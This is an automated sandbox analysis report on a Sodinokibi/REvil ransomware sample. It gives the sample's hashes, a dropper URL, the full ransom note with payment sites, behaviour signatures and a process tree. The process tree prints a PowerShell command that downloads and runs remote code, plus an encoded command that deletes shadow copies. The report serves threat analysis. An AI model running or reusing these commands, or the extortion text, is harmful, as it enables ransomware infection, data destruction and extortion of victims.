Analysis

  • max time kernel
    141s
  • max time network
    158s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    16-07-2020 05:10

General

  • Target

    594f735f38e39066e0ea5392e1a93dba.bat

  • Size

    219B

  • MD5

    2dcb6e0063636fed2c26c0b88d389592

  • SHA1

    001718f5ec05cecbdd87d1950fb13fa8e8b1c93f

  • SHA256

    4df4f51379a5fdc56671e999a52ac96c8b4fd0194a2af6f602bc7fc20825ea1a

  • SHA512

    a3157d8ad3f0a88b822774239cdfb1ea7e15fcd89b8061310656239ff64a0480f1ef9a8d70fee76e759de63cb31eeb29f175518776a93c7951f90228abdb4644

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/594f735f38e39066e0ea5392e1a93dba

Extracted

Path

C:\bil00860m0-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension bil00860m0. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C959B15DE75CD3E0 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/C959B15DE75CD3E0 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 3tPoSMtQXzvmkUFRLmPf2MT3CpPcrHyEZitdcDYezvR3kdIQDrEqkM6gVW5s2W1I wZ0yCJIVwHF0tJ9+WvkaEEi0zPrcstefIBypTeTfuJKzehAWJ4uck3b6FPGnmnrd 0qLzZumTdwBBBlv7q/va6Vqu0x6xAtsD6gCU4LERMZpwYLJNZhqutCsMmO55z5PI zkOV3zQI4MgqkZjSMSPkOLobuu33BbJ7/Uj9kFGeYo7AjBwgslyFCLEWIYw2PE6H moN4Gno7yxTvgby9om+jQtuhbXr64M6vS/WBhSbO3UMsKGQO8Kk7D13eJ5ksiS0S EVPPozf2w1LXzlgg5ZQinm7us/cflitH/ZmA6/Zbo+Lx1zy/hUiIqIZYJbQhklNe bs91v2sAsHaCerPFC7SStTbGibQo2foMFnazQIFmJo2OXgUM7bXyxjID1z4Uy7h8 wlv1OaRVJwfDcwKA7Ul/xWldv65IYtsSyPr48c+Za1ijBFpqhTNOf6Wro0PErxkW zNzCMAokuVPczqdxI0m/Rw62IJSOIbukauIoy4nrKeEPKwR4jwNju5YdutOmjNul 8QgDX4WUyga9vs4AyOVEdgDg8OolqS7ID/mJGcPCatDGWXuo0pK+wkyPcoMb9si5 Vq0JiEpYGG6R56IoscpfC3Qzd6J0XS/Xg5pPBwdgrkTawhK7D9QyciRJ2S/8S7ZY 2PtS/ZASj3If3aUnz4Md7a6/etPijVwLLBTPdqnOuhEe0oFWwl46yuf0+2sRgVUO fXuWjjOpC0PuoSNj9vebrX8pzj5OjI62BYmMJ5QkxD/HRbLaBPnVodiv4/bduyR2 Sp6QWooYbxOkF9QNHcd85DdfoLXOxdCIRwFe8kZdeTCmFS4wkxhxI07dsytrnyUk ThbrNCDfG72egG4oKRx0j/pS0l+1nZz5xs4OZ8FaBTIk56NNfTA4Rulmt0Xp1GeR piwqAamq8CTMRTVQNn4khCDDGavTHv/KWvSAmBWEpI4bK3c59Vr2v50iQobiu4fw uBiN2+YaHUQ+OsRlW/D3pXZg5tjf8Uk0rrsOfaOXho9BB1XJ2kh/EaAnogeYl2PG C+K+65ruswVd4HxWj6pzQw7LSxx1VvJiADyGERV95OnJZhiI+nyGvWNl84AionIg eRiBmupoIAL/V/xvqPaN6hfAygupKrLuwU9UeQtAxlZvMwj23HMKLlch2jgwc52u LT2ZPEz/Hseu0KcAzC357/IyUZZ07rzoKrZCkAshklufUrSDf17cjx9k9yhUAArN ZVubMK9CgNA7xWZ0a2Ei004lKiHc5mG7LJo3RZilxKu7L1rewemD9w== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C959B15DE75CD3E0

http://decryptor.cc/C959B15DE75CD3E0

Signatures

  • Suspicious use of WriteProcessMemory 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Drops file in Program Files directory 29 IoCs
  • Drops file in System32 directory 1 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 192 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\594f735f38e39066e0ea5392e1a93dba.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1068
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/594f735f38e39066e0ea5392e1a93dba');Invoke-SWAGNDKFQZBV;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Drops file in Program Files directory
      • Drops file in System32 directory
      • Modifies system certificate store
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      PID:1424
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1052
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1784

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

  • memory/1052-3-0x0000000000000000-mapping.dmp

  • memory/1424-0-0x0000000000000000-mapping.dmp